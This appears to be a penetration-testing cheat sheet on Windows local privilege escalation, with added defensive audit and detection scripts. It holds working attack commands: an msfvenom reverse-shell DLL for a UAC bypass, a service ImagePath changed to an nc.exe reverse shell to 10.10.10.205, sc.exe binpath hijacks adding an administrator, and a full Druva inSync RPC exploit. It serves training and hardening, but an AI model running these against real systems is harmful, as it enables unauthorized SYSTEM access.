# OS Attacks

## User Account Control (UAC)

### Confirming UAC Enabled

```powershell
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
```

### Checking UAC Level (When Enabled)

```powershell
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
```

<https://github.com/hfiref0x/UACME>
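The two `REG QUERY` commands above only dump raw DWORDs. The following is an added example (not from the original page or from UACME) that reads the same key with PowerShell, decodes the documented `ConsentPromptBehaviorAdmin` values, maps them together with `PromptOnSecureDesktop` onto the four positions of the UAC slider, and offers a remediation function. Function names are my own; it assumes an elevated PowerShell on the host being assessed.

```powershell
# Added example (not part of the original page): read the UAC policy values the
# REG QUERY commands return and turn them into a hardening verdict.
# Assumption: run in an elevated PowerShell session on the assessed host.
$UacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# Documented meanings of ConsentPromptBehaviorAdmin (0-5)
$AdminPromptMeaning = @{
    0 = 'Elevate without prompting'
    1 = 'Prompt for credentials on the secure desktop'
    2 = 'Prompt for consent on the secure desktop'
    3 = 'Prompt for credentials'
    4 = 'Prompt for consent'
    5 = 'Prompt for consent for non-Windows binaries (Windows default)'
}

function Get-UacPosture {
    $p = Get-ItemProperty -Path $UacKey -ErrorAction Stop

    # A value that is absent from the key means the Windows default applies
    $enableLua     = if ($null -ne $p.EnableLUA) { [int]$p.EnableLUA } else { 1 }
    $adminBehavior = if ($null -ne $p.ConsentPromptBehaviorAdmin) { [int]$p.ConsentPromptBehaviorAdmin } else { 5 }
    $secureDesktop = if ($null -ne $p.PromptOnSecureDesktop) { [int]$p.PromptOnSecureDesktop } else { 1 }

    # Map the three values onto the four positions of the UAC settings slider
    $slider = if ($enableLua -eq 0 -or $adminBehavior -eq 0) { 'Never notify' }
              elseif ($adminBehavior -eq 2 -and $secureDesktop -eq 1) { 'Always notify' }
              elseif ($adminBehavior -eq 5 -and $secureDesktop -eq 1) { 'Notify me only when apps try to make changes (default)' }
              elseif ($adminBehavior -eq 5 -and $secureDesktop -eq 0) { 'Notify me only when apps try to make changes (do not dim)' }
              else { 'Custom policy' }

    # Silent auto-elevation of signed Windows binaries, which the "Bypassing UAC"
    # method in this section depends on, is only disabled at "Always notify".
    [pscustomobject]@{
        EnableLUA                  = $enableLua
        ConsentPromptBehaviorAdmin = "$adminBehavior ($($AdminPromptMeaning[$adminBehavior]))"
        PromptOnSecureDesktop      = $secureDesktop
        SliderLevel                = $slider
        AutoElevateExposure        = ($slider -ne 'Always notify')
    }
}

# Remediation: move the host to "Always notify". Changing EnableLUA only takes
# effect after a reboot; the prompt-behaviour values apply to new elevation requests.
function Set-UacAlwaysNotify {
    Set-ItemProperty -Path $UacKey -Name EnableLUA -Value 1 -Type DWord
    Set-ItemProperty -Path $UacKey -Name ConsentPromptBehaviorAdmin -Value 2 -Type DWord
    Set-ItemProperty -Path $UacKey -Name PromptOnSecureDesktop -Value 1 -Type DWord
}

Get-UacPosture | Format-List
```

`AutoElevateExposure = True` on a workstation used with an admin account is the finding to report; the same values are available through Group Policy under Security Options if you prefer to enforce them centrally rather than with `Set-UacAlwaysNotify`.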

### Bypassing UAC (Method)

```powershell
# Checking Path Variable
cmd /c echo %PATH%

# Generate Reverse Shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8443 -f dll > srrstr.dll

# Test Reverse Shell
rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll

# Execute UAC
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
```

## Weak Permissions

### Weak Permission Audit

<https://github.com/GhostPack/SharpUp/>

```powershell
.\SharpUp.exe audit
```

#### Manual Permission Check

```powershell
# icacls prints the ACL of a file or directory; look for (W), (M) or (F) granted
# to Everyone, BUILTIN\Users or Authenticated Users
icacls <filepath>
```

#### 1. Replace Service Binary Path

```powershell
# Use sc.exe explicitly: in PowerShell, "sc" alone is an alias for Set-Content.
# sc.exe requires the space after "binpath=".
sc.exe config WindscribeService binpath= "cmd /c net localgroup administrators htb-student /add"
```

#### 2. Restart Service

```powershell
sc.exe start WindscribeService
```

## Unquoted Service Path

### Find Unquoted Service Paths

```cmd
:: Run from cmd.exe: """ passes a literal double quote to findstr, which PowerShell would not
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
```

### Check Weak Service ACL (AccessChk.exe)

```powershell
# -k registry key, -v verbose, -u suppress errors, -q no banner, -s recurse, -w only objects the user can write
accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
```

### Modify ImagePath

```powershell
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
```
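SharpUp, `icacls`, the `wmic`/`findstr` one-liner and AccessChk above each find one piece of the picture. The following added example (my own code, not from the original page, SharpUp or Sysinternals) audits every installed service for the two misconfigurations the "Weak Permissions" and "Unquoted Service Path" sections exploit: a service binary or its directory writable by a low-privilege principal, and an unquoted path containing spaces. The list of principals treated as low-privilege and all function names are my assumptions; it changes nothing and is meant to be run elevated so every ACL can be read.

```powershell
# Added example (not part of the original page): read-only audit of service
# binaries for writable paths and unquoted paths with spaces.
# Assumption: run elevated so that every service binary's ACL is readable.

# Principals whose write access on a service binary is a finding (my choice of list)
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# Any of these rights lets the binary be replaced or its permissions changed
$WriteRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'

# Extract the executable from a service PathName such as
#   "C:\Program Files\Vendor\svc.exe" -arg   or   C:\Program Files\Vendor\svc.exe -arg
function Get-ServiceBinary {
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }   # quoted path
    if ($PathName -match '^(.*?\.exe)') { return $Matches[1] }  # unquoted: up to first .exe
    return ($PathName -split ' ')[0]
}

# A finding only when the path is unquoted AND has a space before the .exe
function Test-UnquotedPath {
    param([string]$PathName)
    if ($PathName.StartsWith('"')) { return $false }
    return ((Get-ServiceBinary $PathName) -match ' ')
}

# True if any Allow ACE grants a low-privilege principal a write-class right
function Test-WritableByLowPriv {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if ($null -eq $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteRights) -ne 0) { return $true }
    }
    return $false
}

function Invoke-ServiceHardeningAudit {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName) { return }        # skip kernel-side entries with no image
        $exe = Get-ServiceBinary $svc.PathName
        $findings = @()
        if (Test-UnquotedPath $svc.PathName)                        { $findings += 'UnquotedPathWithSpaces' }
        if (Test-WritableByLowPriv $exe)                             { $findings += 'BinaryWritable' }
        if (Test-WritableByLowPriv (Split-Path -Parent $exe))        { $findings += 'BinaryDirWritable' }
        if ($findings) {
            [pscustomobject]@{
                Name      = $svc.Name
                StartMode = $svc.StartMode
                RunAs     = $svc.StartName
                Path      = $svc.PathName
                Findings  = ($findings -join ',')
            }
        }
    }
}

Invoke-ServiceHardeningAudit | Format-Table -AutoSize
```

Services that run as `LocalSystem` with `StartMode = Auto` and any finding are the ones to fix first: quote the path with `sc.exe config <name> binpath= "\"C:\Program Files\Vendor\svc.exe\""`, and remove the write-class ACEs with `icacls <path> /remove:g "BUILTIN\Users"` (or the principal the audit reports).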

## Vulnerable Services

### Gather Installed Programs

```powershell
wmic product get name
```

### Gather Running Services

```powershell
get-service | ? {$_.DisplayName -like 'Druva*'}
```

#### PoC

```powershell
# Abort on the first error so a failed connect is not silently ignored
$ErrorActionPreference = "Stop"

# Command that the inSync client service will run
$cmd = "net user htb-student /add"

# TCP connection to the inSync client's local RPC listener
$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

# Protocol banner, RPC type 0x05 as a little-endian DWORD,
# then the command string as UTF-16LE preceded by its byte length
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd")
$length = [System.BitConverter]::GetBytes($command.Length)

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
$s.Close()
```
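Every escalation on this page ends the same way: a `net user ... /add` or `net localgroup administrators ... /add` executed by a SYSTEM-level service. The Security log records those as event 4720 (user account created) and 4732 (member added to a security-enabled local group). The following added example (my own code, not part of the original page) hunts the local log for both, keeping only 4732 events whose target group is `BUILTIN\Administrators` (well-known SID `S-1-5-32-544`). Function names are mine; it assumes an elevated shell and that "Audit User Account Management" and "Audit Security Group Management" success auditing are enabled.

```powershell
# Added example (not part of the original page): find local account creation and
# additions to BUILTIN\Administrators in the Security log.
# Assumptions: elevated shell; Account Management / Security Group Management
# success auditing is enabled (it is on by default on client Windows).
param([int]$Days = 7)

$AdministratorsSid = 'S-1-5-32-544'   # well-known SID of BUILTIN\Administrators

# Read one named EventData field from an event's XML
function Get-EventField {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

# Best-effort SID -> account name; returns the SID unchanged if it no longer resolves
function Resolve-Sid {
    param([string]$Sid)
    try {
        (New-Object System.Security.Principal.SecurityIdentifier($Sid)).Translate(
            [System.Security.Principal.NTAccount]).Value
    } catch { $Sid }
}

function Find-LocalAdminAbuse {
    param([datetime]$Since)
    $filter = @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $Since }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        # The Subject is who performed the change. A Subject ending in "$" is the
        # machine account, i.e. a SYSTEM-level process such as an abused service,
        # which is exactly what the techniques on this page produce.
        $subject = Get-EventField $e 'SubjectUserName'
        if ($e.Id -eq 4720) {
            [pscustomobject]@{
                Time      = $e.TimeCreated
                Event     = 'LocalUserCreated'
                Target    = Get-EventField $e 'TargetUserName'
                Subject   = $subject
                BySystem  = $subject.EndsWith('$')
            }
        }
        elseif ((Get-EventField $e 'TargetSid') -eq $AdministratorsSid) {
            [pscustomobject]@{
                Time      = $e.TimeCreated
                Event     = 'AddedToLocalAdministrators'
                Target    = Resolve-Sid (Get-EventField $e 'MemberSid')
                Subject   = $subject
                BySystem  = $subject.EndsWith('$')
            }
        }
    }
}

Find-LocalAdminAbuse -Since (Get-Date).AddDays(-$Days) | Sort-Object Time | Format-Table -AutoSize
```

Rows with `BySystem = True` are the ones worth pulling process-creation telemetry for (Security 4688 with command-line auditing, or Sysmon event 1) around the same timestamp; a service that spawned `cmd.exe /c net user` will be visible as the parent process there.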
